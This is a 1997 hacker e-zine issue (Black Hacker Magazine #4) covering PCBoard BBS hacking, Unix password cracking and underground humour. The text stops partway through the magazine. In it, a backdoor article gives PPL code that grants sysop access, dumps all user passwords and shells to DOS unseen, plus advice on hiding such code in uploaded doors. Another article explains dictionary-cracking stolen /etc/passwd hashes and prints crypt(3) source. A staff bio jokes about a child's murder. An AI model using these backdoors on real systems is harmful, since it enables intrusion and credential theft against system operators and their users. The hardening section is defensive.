@BEGIN_FILE_ID.DIZ ________ \ \_______________ ----\_____ \ / ____/_________ ----bio!| \ /____________ /-. | |_________\________ / / | | \_______/ | | ns! - black hacker magazine #4 | | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | - ascii edition - | | articles on hacking, phraud | | internet, and lotsa more! Leech | | it now you lamahs! | | | `--[11/08/97]-------------[o1/o1]--' @END_FILE_ID.DIZ .----softbank------. .---------------. | ZD ^ ZIFF-DAVIS | | A W A R D E D | `------------------' | | | sell-out mag | | of the MONTH | | July 1997! | `---------------' A N ____________________ _______________________________ \ _ \ _ \ \_ ______\_____ \ \ |----\ | | | | | |_____ | | | | _____| | | | | | | | | _ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |____| |____ | |____ |____| |____|____ | .=======`----'====`----'========`----'====`----'=========`----'==. | O F F I C I A L N O S H I T ! R E L E A S E | `----------------------------------------------------------------' gomez _/\/\_ says! \_o0_/ "You're gonna get high on knowledge, and _______oOOo(____)oOOo_______ I'm gonna be your pusher!" | U | |______.ooO________Ooo.______| ( )`--.---'( ) | | | | | `-' : `-' - hacked, packed and released! - the almighty... sS$ ----b-l-a-c-k----- $$$�$Ss sS$�$Ss sS$�$Ss sS$ $$$ sS$�$Ss sS$�$Ss ------------- $$$$$$$$$$$$$$$$$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$ $$$ $$$ $$$�$$$ $$$ ��� $$$s$$� $$$s��� $$$ $$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$s $$$ $$$ $$$ $$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ �$$ $$$$$$$$$$$$$ ------------------ $$$ $$$ $$$ $$$ $$$s$$$ $$$ $$$ $$$s$$$ $$$ -m-a-g-a-z-i-n-e- �$$ n u m b e r f o u r �$$ Editorial Staff: Codeblaster and Ripperjack Chief Editor: Codeblaster Subeditor: Ripperjack Drafting Committee: Codeblaster and TNSe Couriers: Aphazel Mr. Quaint Writers: Codeblaster Deathwalker Ripperjack Phiber X * Buzzbug XiZoL TNSe M. *NOTE* if you're in a windows environment use DOS' EDIT.COM to view this text for maximum performance! :)= .-===========================================================================-. | _/_ | Black Hacker Magazine Issue #4 | | ._______ // /]! | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | ___ __ __|_ \_.__\\ ________/______ | [A] - [b] - [c] - [d] - [e] | |(__/ \ / _ \ _ / _/_ | 094 258 1823 1945 2181 | | |____ /_ / _ /__ / _____\\ ___ \__) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | /________\_ n o s h i t ! \/ | Prestuff: Just some opening | | / | stuff, editorial and such ... | `-===[SECTION A: PRESTUFF]===================================================-' .-==[Editorial]==============================================================-. |===[By: Codeblaster]=[BHM#4]=[01k]=[#01]=====================================| `-===========================================================================-' As you proably noticed in the beginning of this file, BHM, has - as many other great magazines - sould out to Ziff Davis! And from beeing a non- commercial, information freedomfighting group/zine, it has now become a highly commercial zine, where we write Mr. Davis' thoughts. The rules are - we have to have the Ziff-Davis logo at the top of every file, we have to mention his name (Ziff) at least one time every 1000 words - and we're not allowed to have any illegal articles. (articles about hacking, phreaking and anarchy are considered illegal) - AND, get this (this is the hard part), WE HAVE TO SPELL RIGHT! :/ (that means we can't say "werd", "sup?", etc.)... hmmmm K, 'nuff bs. let's kick it hard... Black Hacker Magazine has some kewl info this time, but we're (still) lacking alot on the unix section. Me and Ripperjack have finally installed unix and moved from lamers to wannabe's ;) That means, that you'll probably see some more unix stuff here in the future, as we expand our knowledge on the subject. We need more writers, so please send us articles by email. I'm joining the Army in a couple of days, so this will probably be the last BHM for a while (I'm going to be there for 12 months). Due to this, Ripperjack is temporarily in charge of NS!, which means he can release files etc. but I doubt there will be a BHM until I come back ... but then again, he might surprise us all :) Well, anyway - this was a bit release, I wanted to add more stuff but we didn't get time due to the deadline (Middle of Augus'97). We have also added some new sections this issue - sections you will find in each BHM from now on; Contest (with a price! wow;), News & an Add section. So check it out. `So much to read, so much to learn - but so little time' - that's actually a real problem to me. fewk, I need to be able to stop time or something. Codeblaster/food^ns!^grs gomez _/\/\_ says! \_o0_/ <- In case you're wondering what that dude _______oOOo(____)oOOo_______ is doing right under the NS! logo then | U | let me introduce you to GOMEZ! He's some |______.ooO________Ooo.______| kind of smart animal, and he is going to ( )`--.---'( ) be our official mascot from now on! | | | | | Ladies and hackers, please welcome.... `-' : `-' "GOMEZZZ!!!" (*applause*) http://gudmund.vgs.no/~anepm/hpa/ .-==[Table Of Contents]======================================================-. |===[By: Codeblaster]=[BHM#4]=[03k]=[#02]=====================================| `-===========================================================================-' _ ___.-. _ ___ ___ ___ ___ ___ ___ _ ___ ___ _ ___ _/ l_/ \_|_/ |_/ _| _/ \_ _| _/ _/ \_ \_l_| _| \_l_/ \_ \_ _/_ | _/ \_ |\_ _/ \_ | _/_/ \_ l\_ | _/| _/_/_ _/_ | _/_/_ l__/ | | | | | | | | | | | | | | | |_| | | | | | | | | | | | l_ | | l | | | | | l | l | | | | | | l | | | | | l | l | | | l | | | l_ l_| l___l_ l_ |�2F�l___l_| l_ l___l_| l_ l_ l_| l_ l_ | `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' .--.-----.-------t-a-b-l-e---o-f---c-o-n-t-e-n-t-s------------------. |# | Line| Subject |k | |--|-----|----------------------------------------------------------| |=====[SECTION A: PRESTUFF]=========================================| |01| 106 | Editorial |01k| |02| 162 | Table Of Contents |03k| |03| 204 | Buzzbug joins NS! A Little intro from himself :) |02k| |=====[SECTION B: HACKING!]=========================================| |04| 269 | Pcboard Backdoors Reviewed |11k| |05| 482 | How to protect your BBS/Pcb from beeing hacked |08k| |06| 643 | Desire Bug / Olm Bug (?) |02k| |07| 683 | Another Cracking Unix Passwords Article (Newbies) |14k| |08|1200 | Basic Cracking by TNSe'97 |15k| |09|1388 | Cereal Hacker: Legendary inspiration or a has-been? |17k| |10|1638 | The hackers worst nightmare (?) |04k| |11|1721 | Find bugs in Unix Systems |02k| |12|1776 | My first hack |03k| |=====[SECTION C: MISC STUFF]=======================================| |13|1834 | How to earn (alot of) money on Credit Check Fraud |01k| |14|1855 | One of the better ways to hide DOS files (?) |03k| |=====[SECTION D: INTERNET]=========================================| |15|1956 | Hexediting your MIRC32.EXE to make it eliter! :) |03k |16|2015 | New way of earning money on The Internet |01k| |17|2032 | Internet Resources (kewl URLs) |08k| |=====[SECTION E: BYE-BYE!]=========================================| |18|2193 | This Issues CONTEST! First time EVER in BHM! |01k| |19|2229 | Add Section! Private, personal adds here! |02k| |20|2266 | NoShit! BBS'(HQ's and Dist Sites) |02k| |21|2300 | That's it for this time folks! ;) | | `--`-----`------------------------------------------------------'---' .-==[Buzzbug joins NS! A Little intro from himself :)]=======================-. |===[By: Buzzbug]=[BHM#4]=[02k]=[#03]=========================================| `-===========================================================================-' !$#!BuzzBug!#$! No Shit! got a new writer called BuzzBug. No one knew shit about him so we decided to phone the Swedish Police and ask about him. And they sent us his crime record. 1. Busted for Phreaking 4 times. 2. Busted for Robbery. 3. Busted for Murder on a 3 year old child. 4. Escaped from jail 1997-07-09. 5. GONE! No one knows where he his. Then we phoned his mom (dont ask me how we got the number). And she told us that he always was searching for THE ULTIMATE 2600Hz TONE. His mom was so ugly so we tried to hang up as fast as we could. Well the Murder was cool so we decided to phone the childs parants : Dad - Mr. Andersson NoShit! - Hello we would like to know if BuzzBug killed your child ? Dad - Yes he did but i dont want to talk about it (Dad is Crying). NoShit! - OK. But do you know why he did it ? Dad - No i dont. He smashed the door to our apparment at the same time he was screaming "I NEED 2600HZ TONES IN MY BLOOD!" he was crazy. Then he saw our child playing around with the phone.....please i dont want to talk about it. NoShit! - Dont be a Pussy keep on! Dad - Ok....well when he saw our kid playing with the phone he said "YOUR KID DOSENT NEED 2600HZ TONES AS MUCH AS I DO!" then he shoot my kid (Dad crying more!). NoShit! - C'mon keep it moving.... Dad - HE SHOOT MY KID IN THE HEAD!$!# NoShit! - Calm down....... Dad - Then he connected him self to the phoneline and disappeared. NoShit! - Thats all? Dad - Yes it is (crying) NoShit! - Ok. God Bye. *CLICK* BuzzBug was arrasted 3 weeks later while he was screaming : "I NEED 2600HZ TONES !" in a supermarket in Sweden. 6 months later BuzzBug Escaped from jail when he connected him self to the Phone. NO ONE knows where he is but some dudes belives that he is out somewhere in CyberSpace searching for THE ULTIMATE 2600HZ TONE!#$ - BuzzBug Mail : BuzzBug@Hotmail.com .-===========================================================================-. | _/_ | Black Hacker Magazine Issue #4 | | ._______ // /]! | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | ___ __ __|_ \_.__\\ ________/______ | [a] - [B] - [c] - [d] - [e] | |(__/ \ / _ \ _ / _/_ | 094 258 1823 1945 2181 | | |____ /_ / _ /__ / _____\\ ___ \__) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | /________\_ n o s h i t ! \/ | Hacking!: What do you think? | | / | | `-===[SECTION B: HACKING!]===================================================-' .-==[Pcboard Backdoors Reviewed]=============================================-. |===[By: Codeblaster]=[BHM#4]=[11k]=[#04]=====================================| `-===========================================================================-' Okay, we've written some about Pcboard hacking in earlier issues of BHM, but we've never looked at backdoors in PPE's (Pcb doors/compiled scripts) So, since this is one of the most popular ways of hacking Pcboard, I'm going to look a little closer on that in this article. Here's a little index of this article: 1........................Classic Backdoors 2........................Backdoor Scanners 3.......................Advanced Backdoors 4.......PPE's that can be used for hacking 1. Classic Backdoors ~~~~~~~~~~~~~~~~~~~~ Classic backdoors are pretty lame, cause the PPE Backdoor scanners will find them, and the sysops will most likely find them their self. But I'm going to show you some examples, so you get some idea (or you can use this as a list of backdoors NOT to use;) GETUSER ; Get User Info U_SEC = SYSOPSEC() ; Set security level = Sysop's PUTUSER ; Save User Info Okay, this is probably the most common backdoor - as you've probably understood, this is supposed to give the current user sysop's security level. However, what most don't know is that the code above doesn't work as it should. When you run the code above you get sysop's security level MINUS ten. I don't know why it is that way, maybe it's a bug in pcboard or something, but it is that way. So, the correct code would be: GETUSER ; Get User Info U_SEC = SYSOPSEC()+10 ; Set security level = Sysop's PUTUSER ; Save User Info Ok, from now on I will refer to the backdoor code above as Backdoor #1. The next backdoor is also pretty classic (we'll call this one Backdoor #2); STRING USERSFILE ; Define Strings INT X,USERS ; Define Integers USERSFILE = READLINE(PCBDAT(),29) ; Get Users filename/path USERS = FILEINF(USERSFILE, 4) / 400 ; Get Number of Users ; Size of userfile / 400 ; since each record is 400b FOR X = 1 TO USERS ; A loop GetAltUser X ; Get User Record X Println "---------(",X,"/",USERS,")---------" ; Just to make it look good Println U_Name() ; Show Users Name Println U_Pwd ; Show Users PWd NEXT X ; The Loop Again The one above lists all users to the screen. Maybe it's an idea with mprintln (look later in this article). This works fine, but it is often easily discovered by the sysop (if he's not extremely lame that is) 2. Backdoor Scanners ~~~~~~~~~~~~~~~~~~~~ I only know of 2 backdoor scanners for Pcboard. There might be more, if you know of anyone else than the ones released by AEGIS and FOOD let me know. Here they are: AGSPPS10.ZIP 25596 bytes _ __________ _ __________ _____ \ /____ ______\ / _ _\___ \___\_____/ ___/_\______\ ___/___ :. _/ \ __/__ \ \/ \______ \ � __ \_ \_ \_ \_ kL \_ \/ \_ __ __/ /______/________/_______/________/ ,---/_____/-cORP!---------------------------. | | | AEGiS PPE Scanner 1.O | | Scan your PPEs against backdoors and | | others annoying things. PPLX required!! | | | `=[EXE]===============================[1/1]=' FOOD!BKD.ZIP You will probably find the first one on AEGIS' homepage at: http://www.mygale.org/05/aegis/ And FOOD's backdoor scanner you can find on FOOD's homepage: http://www.ozet.de/privat/freezone/food/index.html Personally I prefer FOOD's release, but that's probably cause I was the one who coded it ;). AEGIS is good to use if you're checking the PPE's yourself, but if you want the whole thing automated in your upload processor or something FOOD's release is perfect. Ok, here's the result I got when I scanned the different backdoor sources shown in this article: Backdoor #1: AEGIS: ���� BACK1.PPE MIGHT CONTAIN A BACKDOOR ���� Flags Rh FOOD : Suspicious lines: 3 / Logical Backdoor: 1 of 3 Backdoor #2: AEGIS: ���� BACK2.PPE MIGHT CONTAIN A BACKDOOR ���� Flags: Rdh FOOD : Suspicious lines: 5 / Logical Backdoor: 2 of 3 *NOTE* about AEGIS' ppescanner: The flags used are: F - Change conference flags status W - Write user R - Read user D - Delete user A - Adjust online time remaining B - Brute hangup M - Send text to modem only S - Shell to DOS C - Call child PPE I - Interrupt call P - Poke in memory c - Change password a - Adjust ratio f - Flag files for download d - Access PCBOARD.DAT p - Peek in memory H - Read Password or Password History i - Sequencially read files in directory s - Sysop level access If one of the flags above are found, the AEGIS ppescanner will report: "���� SCANNED.PPE MIGHT CONTAIN A BACKDOOR ����" and that's kind of lame cause *MANY* ppe's use the commands above. That means that if you scan a userlister, filelist ppe, qwk download, login ppe, etc.etc.etc. you will get "MIGHT CONTAIN A BACKDOOR" ... 3. Advanced Backdoors ~~~~~~~~~~~~~~~~~~~~~ First, some hints'n'tips: * Use MPRINTLN instead of PRINTLN. This prints to YOUR screen only and not SYSOPS screen. So when you list all his users he will just think the PPE hangs a couple of secs ;) * When you add backdoors don't add the whole code, make it "fit in". Fex. if you add a backdoor to a userlister, variables such as NUMBER OF USERS etc. will most likely exist from before. A good backdoor is only 1 line added to a source. * Compile your PPE's as PPE 3.30, this way the sysop might have more problems decompiling it. Ok, I'm not going to list hundreds of backdoors codes here, cause I haven't got the time for that - but I'll show you a couple I think is neat; * Just use the CALL command to call another PPE (which contains the real backdoor). You upload the PPE containing the backdoor when you're going to do the hack - this requires that we know his UPLOAD directory, but then again that's not very hard to find out using the 'TEST' command to test a file in the upload directory. You can add this in whatever ppe you want; IF = "FUCKTHIS" THEN CALL +PPENAME.PPE <- Pseydocode ofcourse, if you know anything about PPL this shouldn't be any problem, if you don't then don't even think of hacking PCBoard. * You can use the SHELL command, although this command is more likely to be a backdoor then the one above. But it's easier though, just add INT CODE ; Just to define the CODE variable as INTEGER STRING DOTHIS ; Just to define the DOTHIS variable as STRING DOTHIS = "CTTY>"+READLINE(PCBDAT(),52) IF = "FUCKTHIS" THEN SHELL TRUE,CODE,DOTHIS,"" (Pseydocode) This will allow you to shell to DOS and do whatever you want there, while the sysop sees nothing but a his board on the screen (Like it's hanged) Just experiment, there are MANY commands in PPL that can be used as back- doors, so it really isn't that hard. 4. PPE's that can be used for hacking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Some PPE's can be used to hack with even if they don't contain backdoors. These have major bugs, and I'm compiling a list of PPE's that have these bugs - so if you know of any please email them to me! An example of ppe's which often have this kind of bugs are PCB/ANSI viewer PPE's (Art PPE's). These often let users add ansis and they often use the DispFile command to display the ansis to the screen. If a user then adds "!C:\UPLOAD\RUN.PPE" in an ansi and displays that with the art-ppe RUN.PPE will be executed. Here are one I found: -(FileName)---(Rel.date)----------------(File_id.diz)------------------------- FSW-AG.ZIP 25.02.95 _______________________ __ __ __ \__ _______/ _______// | | \_ Comment: One can use this PPE to ::| _____)_____ \::_/ | | /: view every file on the whole HD, ::| \__/eR! | \_\_____ /:: and also run PPE's. Easy hack. [=|_____/\__________/[fSW]\____/==] | ALiENViEW v1.0 By Code Zero | | The Best Ansi/TXT/ASC/PCB..etc.| | Viewer PCBoard Has Ever seen! | | Upload/Download/View/MultiConf | | Supports Up to 9990 Files !!! | | And 999 Conferences w/ 10 Files| | Per Conference! This is Cool! | `-[02/25/95]----------------------' I need more PPE's on this list, so if you have some PPE's please look for this; Art PPE's (as the first above), Wall PPE's that uses Dispfile, Oneliners that users Dispfile, flag ppe's with bugs, download ppe's, etc. Ok, due to lack of time before releasing this magazine, I couldn't check all my PPE's, so this is the only one included in this mag. It's just meant as an example anyway, so it doesn't matter. If you have any released PPE's with known backdoors please send some info to blackhackers@hotmail.com ... Maybe I'll compile a huge list some day :) - Codeblaster/Food^ns!^Grs .-==[How to protect your BBS/Pcb from beeing hacked]=========================-. |===[By: Codeblaster]=[BHM#4]=[08k]=[#05]=====================================| `-===========================================================================-' In my years as a bbs hacker I've been stunned time after time over how stupid some sysops really are. This is a little tutorial on how to protect yourself from beeing hacked, it's written for Pcboard but some of these hints will fit other systems too. When my board was up, I KNEW it was 99,99% hacking-proof. If anyone were to hack it, it would be my fault, and not the systems. This can also be a guide to setting up a hacking-proof bbs. So if you're a sysop, read on... Some general hints: =================== * Never let the paths/filenames in your system be default. Fex. in PCBOARD never use the directory C:\PCB, in Remote Access never use C:\RA and in BBBS/MBBS never use C:\BBS (You should never use this no matter what sytem you have, btw). It's also a good idea to change names of important files. Fex. when we hacked Pcboard we often used a search engine that searched for PCBOARD.DAT I know this method is often used, so if you're smart you would change this filename to HUBAHUBA or something like that and run PCBOARD.EXE with the parameters : PCBOARD.EXE /FILE:HUBAHUBA (*NOTE* If you rename the PCBOARD.DAT file some utils that are made for Pcboard might cause problems. F.ex. PFED - cause they only ask for the PATH wich PCBOARD.DAT is placed in, not the NAME. This is something that should be fixed in PFED and similar programs, since keeping the original filenames of importing files as that often is a security risk) Users file etc. is also a good idea to rename if you can. * Remove / don't add support for RAR (the archiver) in your upload processor. As we exposed in TBH-RAR.ZIP, RAR can be used to hack with if one know the right tricks. If you run Pcboard you don't have to worry, since RAR is not added in as default (You'll have to have added it yourself), but in the newest versions BBBS/MBBS I think it's added. You should avoid having NEW archivers in general in your upload processor since the early versions of programs often have security flaws. Archivers that we have tested and that are safe (from the RAR bug that is) are: PkZIP, Arj and Lha. * Never run programs you're told to run in a chat. (this also goes for PPE's and scripts etc.) This is probably #1 hacking method; exploiting the fact that the sysop is a dumbass. If some newuser just uploads a PPE or a EXE and tells you to run it, you should watch out. Try dropping to dos and pretending that you run it, see what he does when you let him out of the chat. * Never do stuff a user you don't know tells you to do. (This only applyes if you're unexperiensed and actually don't know what the fuck you're doing.) Fex. don't press F1 in pcboard cause this gives the user sysop axx, and don't drop to dos and write 'COMMAND.COM COM2' cause this let's him drop to dos etc. If you're not a dumbass, and have a slight idea of what you're doing then you can forget this one. * Don't give users access to commands that can be exploited ;) duh, well it isn't that stupid. If you give a user access to the EXT command in MBBS he can actually hack you (did you know that?) - Sigops useally have access to this command in MBBS, that means that all sigops on MBBS' can hack the board. Pcboard specific hints: ======================= * Remove the 'TEST' command. Hackers can find out ANY directory on your bbs that files is located in, just by TESTING files in the different catagories. This will help hackers alot, since they don't have to make a search engine, and the trojan will be helluva lot faster. You can ofcourse update the 'TEST' command with a PPE or something, but it's probably not worth the work cause no one ever uses this anyways (?). * Remove all sysop commands (1-15) - You probably never use them as you probably never call your bbs and configure it from somewhere else than home. If you do, you can always add a new sysop menu system in a secret command that require sysop-access. ---------- If you're not thinking clear right now, or are a bit unexperiensed with pcboard, you're probably asking yourself "Remove TEST and Remove sysop commands?? Sure, but how the fuck do I do that?". Answer: Well, duh. Install .PPE's doing or printing "This command is removed for security purposes" on the screen (whatever) in CMD.LST ... The PPE must be installed under the commands you want to remove ofcourse. If you want to remove the TEST command, then install this in your CMD.LST TEST 10 0 0 C:\MYBOARD\PPES\REMOVED.PPE And to remove the sysop commands you install the same PPE under 1-15. * Remove the 'HELP' command, or make a PPE only showing the original help files and no others. The \HELP\ directory is perfect for hackers, cause one can place PPE's there and execute them by writing "HELP FUCKYOU" (Where FUCKYOU is the name of the HELP file wich executes the .PPE) The HELP command is never used anyways (well, if you're running a board with lotsa lame users it might be used alot - so then you might wanna make that PPE). * Remove the 'PPE' command (A sysop's command to EXECUTE ppe's). If you don't want to remove it entirely (I sometimes had use for this one) you can make a PPE that first asks for password and if entered correctly executes the PPE specified. * If you're running Pcboard v15.21 (or earlier) upgrade immediately! It's easy to hack you using a bug in the software (as we exposed in Bhm#2), and anyone can run PPE's they upload. If you don't have the chance to upgrade, or don't want to (?), you should close the upload directory for Users. This way, hackers can't upload ppe's and run them. However, when you've valuated the files, and put them on your board, they can run them. * Edit your FSEC file. How to do it? Run PCBSETUP.EXE, press "B" and "B", and then F2 on the FSEC file. Here you add the directories that users can't download files from. Protected directories should at least be \PCB\MAIN\, cause that's where the users file is. You can ofcourse add other directories too. Other Hints: ------------ When my board was up, I had lotsa little utilities I made myself, to make it more hack-proof. Here are some examples of the stuff I had, with a little PPL skills and maybe some Pascal/Whatever skills you can do this yourself: * I had an exe added in my PCB.BAT file that checked the lines 6 to 23 in PCBOARD.DAT for changes. If one of the lines were something else than 110 (fex.) if would alert me. This is a nice way to prevent the classic pcboard trojan, wich set's all sec levels to 0 instead of 110 so anyone can run the sysop commands. (If you've removed the sysop commands you probably don't have much use for this, but why not?) * Many people use those prompt PPE's. Me too. In this PPE I added a check for the users security level. If the user had the same security level as sysop (and he wasn't sysop) he would be logged off immediately. This method was pretty good, cause since the users can't do anything without the ppe pops up, they will be logged off if they in some (weird) way gain sysop access. I noticed the power of this once, when my stupid brother (the only flaw in my system;) gave a user sysop access ("cause the user asked him") blah. Well, the user was logged off a couple of secs later ;) * If you haven't removed the HELP command you can install a program in PCB.BAT wich checks for NEW files in \PCB\HELP\. If any files that shouldn't be there are there, then it should alert you. This is also a classic way to hack pcboard; place new ppe's and help files in \HELP\ they can be runned then. Follow these tips, and you'll have a pretty safe Pcb system - but of course not unhackable. - Codeblaster .-==[Desire Bug / Olm Bug]===================================================-. |===[By: Codeblaster]=[BHM#4]=[02k]=[#06]=====================================| `-===========================================================================-' These bugs were given to me by Inm. Thanx man! Desire Bug ---------- If you have access to the 'V' command in Desire (Which most users have?), you can use it to view ANY files in current directory. That means that you will be able to view the files in C:\DESIRE\*.* - but you have a problem, cause the userfile is not located there is it? Well, by running DOORS you should be able to get current dir to be C:\DESIRE\DATA (or whatever the users file dir is called in desire), and then View the userfile. **IMPORTANT** Oki, that was the bug as I got it reported, but I installed Desire to check it out and I couldn't get it to work on version 1.2b (Maybe it never has worked?). Only the sysop had access to the View command, and he could view files all over the HD. Olm bug ------- You can use @DOORS:xxxxx@ to run any door? Just another one I haven't checked out, so I can't guarantee anything. ------- I can't verify that the bugs above exists/is working, so check it out yourself, and give me some feedback if you want. And while we're at it with this bug thing, why not show you guys a little bug in PCB also; This isn't really a hacking bug, but it can MESS UP pretty well, and it always works. Did you know that by pressing CTRL-X while in a chatter in PCBoard (or whatever PPE), you fuck it totally up so that the sysop will have to load a new chatter? He can't go out to main either! You can continue this until it gets so slow that you think you're back to good ol' 2400 again =) .. Tell the lamer that you've put a virus on his system, and he'll probably freak ;). Maybe you can get him to load so many ppe's that he get memory errors, and maybe that can be explored more? .-==[Another Cracking Unix Passwords Article (Newbies)]======================-. |===[By: XiZoL]=[BHM#4]=[14k]=[#07]===========================================| `-===========================================================================-' * [ see internet resources for wordlists ] Cracking Unix passwords ( in very simple words:-)) Hah, my buddy, you've got in to the system just now and what do you do? Now i'll tell you that you can get more login/password pairs for this system and even root one, if the root is silly enough ,:-) or it's your lucky day. So what do you do for it? You need to get the passwd file for this system, which is usually at /etc/passwd. This file contains the information about all users in this system, including users' passwords, but it's not all so easy, the password there its encrypted.Let's have a look on this file: usually it contains a bunch of lines like this: george:fhUjI0HydqSA:502:501:George Washington:/home/george:/bin/bash As you see it has 6 different fields, each one separated with ":" from the other. The first field here is user name ( or login name ) this one is used by user as the name to enter for the "Enter login:" prompt. the second field,(as you may guess) is password, it is encrypted using one way encryption function, and when user login and enter his password system just encrypt it again using the salt-two characters,(here fh) which are randomly choosen when user set new password,(the system always save it as two first characters in the encrypted password sequence) and then just check it with the existing encrypted password in passwd. Mind that system DOES NOT DECRYPT PASSWORD, so there are very few chances for us to do the same. ******************************************************************************* !Note!: some systems may have shadowed passwords though, so when you look at the passwd entry, you will see only the asterik(*) in place of password. This means that the password is hidden or "shaddowed" in another file, it might be different file for different systems like in Linux it is /etc/shadow, in FreeBSD it is master.pwd etc ( have a look on system manual to see where the password are. In this case you gotta get this file as well (say using finger hole or any other you know) some folx on #hack told me though, that i can use simple C program to unshaddow this file (its source i attached bellow as well) but i haven't checked it yet, so i can't say whenever it works or not, if check it out, please tell me ok? ******************************************************************************** Going back to passwd line,next field,the number 502 is the User ID, i don't think we can use it here anyhow, so I won't explain about it. The number after UID, is the Group ID, the identifer of the main group,user attached to, ( of course there might be many others groups as well, that you can find at /etc/groups, but the main one always saved in passwd) the next field here is User Real Name, then user home directory, and the last one is user's shell. Now, let's have a close look on encrypted password, as i already said the first two characters here are salt, the random value which is used to extend the number of various combinations of encrypted passwords for each 8 or less character password. And the rest of those characters, are the encrypted passwd, not the passwd in fact, but the array of 64 zero bits encrypted with passwd as the key. Since this enctyption algorythm started being used for passwords encryption, many people were working on reversing it (even the son of well known Morison (the author of the worm-virus) but neither of them was successed, so now the only way is used to break unix passwords, to brutally force it. But the straight forcing may take you years to get the password, so now we use some modification of it which is called intellegent forcing. The idea is next : we have the dictonary of the most used password ( you can get somewhere on the Web, usually it is about 1-2 Mb, but Mind that it might be different for different countries, as the most people choose the password basing on their own language), then you just read entry from passwd and start checking it with every word from your dictonary,crypting with the current salt it before till you find the equvalent encrypted sequence or your dictonary is out, then read the next passwd entry and do the same. On big systems with a bunch of users you will get a number of them surely. Of course if you know some things about some certain user ( say the name of his wife,or his date of birth an so on.. you can use it as well, b/c many newbies make easy-to-remember passwords using their birth dates, phone numbers and stuff like that). Of course you can add a bunch of different tricks to your password breaker to make it more smart (say check every "common password" in you dictonary in upper or lower case, or mixing with digits) but remember it will surely affect on the speed of your program. And one last thing: there are alot of different programs that are to break/check-weak-passwords on unix systems (like Crack) but most of them use the same algorythm. well, here are some source codes which you can find useful while doing your breakers, crackers etc. first is the function which encrypts password with standard unix encryption algorythm using given salt and password and returns the pointer to encrypted passwd.use crypt(password,salt). The second is the source code to unshadow passwd files. Good Hack!:-) Xiz0L [ all flames, corrections, comments, or whatever send to fygrave@freenet.bishkek.su PGP key is awaliable from pgp servers.Don't hehistate to use it. ] this file can be found at URL: ftp://security.dsi.unimi.it/pub/security/crypt/code/crypt3.c /* @(#) $Revision: 66.2 $ */ /*LINTLIBRARY*/ /* * This program implements the * Proposed Federal Information Processing * Data Encryption Standard. * See Federal Register, March 17, 1975 (40FR12134) */ /* Lines added to clean up ANSI/POSIX namespace */ #ifdef _NAMESPACE_CLEAN #define setkey _setkey #define crypt _crypt #define encrypt _encrypt #endif /* * Initial permutation, */ static char IP[] = { 58,50,42,34,26,18,10, 2, 60,52,44,36,28,20,12, 4, 62,54,46,38,30,22,14, 6, 64,56,48,40,32,24,16, 8, 57,49,41,33,25,17, 9, 1, 59,51,43,35,27,19,11, 3, 61,53,45,37,29,21,13, 5, 63,55,47,39,31,23,15, 7, }; /* * Final permutation, FP = IP^(-1) */ static char FP[] = { 40, 8,48,16,56,24,64,32, 39, 7,47,15,55,23,63,31, 38, 6,46,14,54,22,62,30, 37, 5,45,13,53,21,61,29, 36, 4,44,12,52,20,60,28, 35, 3,43,11,51,19,59,27, 34, 2,42,10,50,18,58,26, 33, 1,41, 9,49,17,57,25, }; /* * Permuted-choice 1 from the key bits * to yield C and D. * Note that bits 8,16... are left out: * They are intended for a parity check. */ static char PC1_C[] = { 57,49,41,33,25,17, 9, 1,58,50,42,34,26,18, 10, 2,59,51,43,35,27, 19,11, 3,60,52,44,36, }; static char PC1_D[] = { 63,55,47,39,31,23,15, 7,62,54,46,38,30,22, 14, 6,61,53,45,37,29, 21,13, 5,28,20,12, 4, }; /* * Sequence of shifts used for the key schedule. */ static char shifts[] = { 1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1, }; /* * Permuted-choice 2, to pick out the bits from * the CD array that generate the key schedule. */ static char PC2_C[] = { 14,17,11,24, 1, 5, 3,28,15, 6,21,10, 23,19,12, 4,26, 8, 16, 7,27,20,13, 2, }; static char PC2_D[] = { 41,52,31,37,47,55, 30,40,51,45,33,48, 44,49,39,56,34,53, 46,42,50,36,29,32, }; /* * The C and D arrays used to calculate the key schedule. */ static char C[28]; static char D[28]; /* * The key schedule. * Generated from the key. */ static char KS[16][48]; /* * The E bit-selection table. */ static char E[48]; static char e2[] = { 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9,10,11,12,13, 12,13,14,15,16,17, 16,17,18,19,20,21, 20,21,22,23,24,25, 24,25,26,27,28,29, 28,29,30,31,32, 1, }; /* Lines added to clean up ANSI/POSIX namespace */ #ifdef _NAMESPACE_CLEAN #undef setkey #pragma _HP_SECONDARY_DEF _setkey setkey #define setkey _setkey #endif /* * Set up the key schedule from the key. */ void setkey(key) char *key; { register int i, j, k; int t; /* * First, generate C and D by permuting * the key. The low order bit of each * 8-bit char is not used, so C and D are only 28 * bits apiece. */ for(i=0; i < 28; i++) { C[i] = key[PC1_C[i]-1]; D[i] = key[PC1_D[i]-1]; } /* * To generate Ki, rotate C and D according * to schedule and pick up a permutation * using PC2. */ for(i=0; i < 16; i++) { /* * rotate. */ for(k=0; k < shifts[i]; k++) { t = C[0]; for(j=0; j < 28-1; j++) C[j] = C[j+1]; C[27] = t; t = D[0]; for(j=0; j < 28-1; j++) D[j] = D[j+1]; D[27] = t; } /* * get Ki. Note C and D are concatenated. */ for(j=0; j < 24; j++) { KS[i][j] = C[PC2_C[j]-1]; KS[i][j+24] = D[PC2_D[j]-28-1]; } } for(i=0; i < 48; i++) E[i] = e2[i]; } /* * The 8 selection functions. * For some reason, they give a 0-origin * index, unlike everything else. */ static char S[8][64] = { 14, 4,13, 1, 2,15,11, 8, 3,10, 6,12, 5, 9, 0, 7, 0,15, 7, 4,14, 2,13, 